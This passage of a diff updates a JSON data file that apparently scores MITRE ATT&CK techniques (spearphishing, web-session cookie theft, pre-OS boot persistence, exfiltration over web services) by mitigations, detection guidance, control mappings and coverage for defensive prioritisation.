+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.43333333333333324,
-        "adjusted_score": 0.43333333333333324,
+        "cumulative_score": 0.590328371904762,
+        "adjusted_score": 0.590328371904762,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "3.3",
-            "4.2",
-            "4.4",
-            "4.7",
-            "5.3",
-            "6.1",
-            "6.2",
-            "6.8",
-            "13.4"
+            "2.3",
+            "2.7",
+            "9.3",
+            "9.6",
+            "13.3",
+            "13.8",
+            "14.1",
+            "14.2",
+            "14.6"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-2",
-            "AC-20",
-            "AC-3",
             "AC-4",
-            "AC-5",
-            "AC-6",
             "CA-7",
-            "CM-5",
+            "CM-2",
             "CM-6",
-            "CM-7",
-            "IA-2",
-            "IA-3",
-            "IA-4",
-            "IA-8",
+            "IA-9",
+            "SC-20",
+            "SC-44",
             "SC-7",
-            "SI-10",
-            "SI-15",
-            "SI-4"
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-8"
         ],
         "process_coverage": false,
         "network_coverage": true,
-        "file_coverage": false,
-        "cloud_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.33333333333333326,
-            "mitigation_score": 0.5272727272727272,
-            "detection_score": 0.12
+            "combined_score": 0.46190476190476193,
+            "mitigation_score": 0.38181818181818183,
+            "detection_score": 0.55
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "prevalence_score": 0.02842361
     },
     {
-        "tid": "T1538",
-        "name": "Cloud Service Dashboard",
-        "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.",
-        "url": "https://attack.mitre.org/techniques/T1538",
+        "tid": "T1566.001",
+        "name": "Phishing: Spearphishing Attachment",
+        "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
+        "url": "https://attack.mitre.org/techniques/T1566/001",
         "tactics": [
-            "Discovery"
+            "Initial Access"
         ],
-        "detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)",
+        "detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.\n\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)",
         "platforms": [
-            "Azure AD",
-            "Google Workspace",
-            "IaaS",
-            "Office 365"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Logon Session: Logon Session Creation",
-            "User Account: User Account Authentication"
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1566",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.22380952380952382,
-        "adjusted_score": 0.22380952380952382,
+        "cumulative_score": 0.3476190476190476,
+        "adjusted_score": 0.3476190476190476,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [
-            "3.3",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8"
+            "2.3",
+            "2.7",
+            "9.3",
+            "9.6",
+            "13.3",
+            "13.8",
+            "14.1",
+            "14.2",
+            "14.6"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "IA-2",
-            "IA-8"
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SC-20",
+            "SC-44",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-8"
         ],
         "process_coverage": false,
-        "network_coverage": false,
+        "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.12380952380952381,
-            "mitigation_score": 0.23636363636363636
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1539",
-        "name": "Steal Web Session Cookie",
-        "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.",
-        "url": "https://attack.mitre.org/techniques/T1539",
+        "tid": "T1566.002",
+        "name": "Phishing: Spearphishing Link",
+        "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
+        "url": "https://attack.mitre.org/techniques/T1566/002",
         "tactics": [
-            "Credential Access"
+            "Initial Access"
         ],
-        "detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.",
+        "detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
         "platforms": [
             "Google Workspace",
             "Linux",
@@ -12776,18 +35522,19 @@
             "macOS"
         ],
         "data_sources": [
-            "File: File Access",
-            "Process: Process Access"
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1566",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
             },
             {
                 "mid": "M1054",
@@ -12802,795 +35549,847 @@
                 "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.4452380952380952,
-        "adjusted_score": 0.4452380952380952,
+        "cumulative_score": 0.2571428571428572,
+        "adjusted_score": 0.2571428571428572,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
         "cis_controls": [
-            "4.1",
-            "6.3",
+            "2.3",
+            "9.3",
             "14.1",
             "14.2",
-            "14.3",
-            "14.6",
-            "18.3",
-            "18.5"
+            "14.6"
         ],
         "nist_controls": [
-            "AC-20",
-            "AC-3",
-            "AC-6",
+            "AC-4",
             "CA-7",
             "CM-2",
             "CM-6",
-            "IA-2",
-            "IA-5",
+            "IA-9",
+            "SC-20",
+            "SC-44",
+            "SC-7",
             "SI-3",
-            "SI-4"
+            "SI-4",
+            "SI-8"
         ],
-        "process_coverage": true,
-        "network_coverage": false,
+        "process_coverage": false,
+        "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.19523809523809524,
-            "mitigation_score": 0.32727272727272727,
-            "detection_score": 0.05
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1542",
-        "name": "Pre-OS Boot",
-        "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.",
-        "url": "https://attack.mitre.org/techniques/T1542",
+        "tid": "T1566.003",
+        "name": "Phishing: Spearphishing via Service",
+        "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.",
+        "url": "https://attack.mitre.org/techniques/T1566/003",
         "tactics": [
-            "Defense Evasion",
-            "Persistence"
+            "Initial Access"
         ],
-        "detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)",
+        "detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
         "platforms": [
             "Linux",
-            "Network",
-            "Windows"
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Drive: Drive Modification",
-            "Driver: Driver Metadata",
-            "Firmware: Firmware Modification",
-            "Network Traffic: Network Connection Creation",
-            "Process: OS API Execution"
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1566",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1542.001",
-                "name": "Pre-OS Boot: System Firmware",
-                "url": "https://attack.mitre.org/techniques/T1542/001",
-                "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
-                "detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
-                "mitigations": [
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
             },
             {
-                "tid": "T1542.002",
-                "name": "Pre-OS Boot: Component Firmware",
-                "url": "https://attack.mitre.org/techniques/T1542/002",
-                "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
-                "detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
-                "mitigations": []
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
             },
             {
-                "tid": "T1542.003",
-                "name": "Pre-OS Boot: Bootkit",
-                "url": "https://attack.mitre.org/techniques/T1542/003",
-                "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
-                "detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
-                "mitigations": [
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3",
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "SC-44",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1567",
+        "name": "Exfiltration Over Web Service",
+        "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
+        "url": "https://attack.mitre.org/techniques/T1567",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
             {
-                "tid": "T1542.004",
-                "name": "Pre-OS Boot: ROMMONkit",
-                "url": "https://attack.mitre.org/techniques/T1542/004",
-                "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.",
-                "detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.",
+                "tid": "T1567.001",
+                "name": "Exfiltration Over Web Service: Exfiltration to Code Repository",
+                "url": "https://attack.mitre.org/techniques/T1567/001",
+                "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
                     }
                 ]
             },
             {
-                "tid": "T1542.005",
-                "name": "Pre-OS Boot: TFTP Boot",
-                "url": "https://attack.mitre.org/techniques/T1542/005",
-                "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)",
-                "detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.",
+                "tid": "T1567.002",
+                "name": "Exfiltration Over Web Service: Exfiltration to Cloud Storage",
+                "url": "https://attack.mitre.org/techniques/T1567/002",
+                "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
+                "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
-                    },
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1046",
-                "name": "Boot Integrity",
-                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                "url": "https://attack.mitre.org/mitigations/M1046"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
             },
             {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
